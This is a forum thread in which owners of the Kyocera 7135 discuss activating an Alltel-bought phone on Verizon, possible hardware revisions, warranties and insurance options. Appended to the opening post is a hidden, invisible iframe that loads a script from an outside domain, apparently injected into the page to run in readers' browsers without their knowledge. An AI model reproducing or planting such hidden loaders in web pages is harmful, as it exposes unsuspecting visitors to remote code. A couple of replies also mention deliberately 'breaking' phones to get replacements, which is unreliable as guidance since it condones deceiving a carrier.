+ Reply to Thread

What are the chances of a Verizon hardware upgrade?

I know no one will be able to truly answer this, but I am really thinking about buying this phone through Alltel and having Verizon activate it. From what I've read, there are a couple risks:

1. It seems the big risk is having Verizon require a hardware upgrade. How likely is this? Would Kyocera really re-spin it's hardware and go through another round of Verizon testing?

2. What if the phone breaks? Who can fix it/insure it? I've read about people roughing up Verizon reps to get them to insure it, but does Kyocera or Alltel offer any warranties if this method fails?

3. Is everyone who has already bought the Alltel 7135 going to attempt to return it for a Verizon 7135 when/if it gets released?

This forum is great and I've learned a lot. First time poster...be gentle. Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: What are the chances of a Verizon hardware upgrade?

Originally posted by KingFeta

2. What if the phone breaks? Who can fix it/insure it? I've read about people roughing up Verizon reps to get them to insure it, but does Kyocera or Alltel offer any warranties if this method fails?

3. Is everyone who has already bought the Alltel 7135 going to attempt to return it for a Verizon 7135 when/if it gets released?
    re 2. Some people are insuring it through their home insurance provider as a "rider" on their home-owners insurance. Some people have mentioned a $50/year cost. As for just fixing it, I assume Kyocera could fix it and charge you. It might have some warranty through Kyocera, not sure.

re 3. I dont have the phone so I cant answer this personally. At least a couple people on this board have hinted that their Alltel phone will mysteriously break or some such on the day they want a new phone (re, Verizon).

+ralph

1. I don't know whether there will be any hardware changes, but I am assuming there won't be anything major.

2. As for breakage, I added a rider to my homeowners policy that covers all damage. Routine problems will have me sending the phone in for warrranty repair with Kyocera.

3. I will keep my 7135 and will just try to get VZW to do whatever software/firmware upgrade is available. I will be out of the return period for GetConnected, so I don't have much choice. As has been said here many times, it is the price you pay for being on the bleeding edge. Besides, my phone is working well, and I like the fact it does not have the external VZW logo (it does have the one I added when the phone starts up). There is also something that appeals to me to be carrying the "pre-VZW" release of the phone.

My 7135 is insured through Verizon ($3.99/mo), though I hear the homeowner's option may be a little cheaper. I did it over the phone, since the guys at the store were (I think) too busy playing with the phone when I took it in for activation to remember to offer insurance. No roughing-up required!

Laurie

The sales rep I activated with suggested insurance before I even mentioned it. I remember looking at the policy for exclusions and didn't see anything about phones purchased elsewhere, but I didn't look that hard either.

I'm sure there is a warranty through Kyocera for a certain amount of time, as well. Someone here reported that they heard of a Kyocera hardware change from a Verizon person in the testing group, but there hasn't been any further mention of it. If it was to the e911 chip, which had been suggested, mine seems to work fine. I don't know what would be changed hardware-wise that I would feel worried about not having, as I have a fully functional phone already.

There is a symbol at the top of the phone screen for whether the e911 chip is communicating. Mine has never said that it wasn't able to work, so I doubt that is a problem.
    ---------------
    The same thing we do every night, Pinky...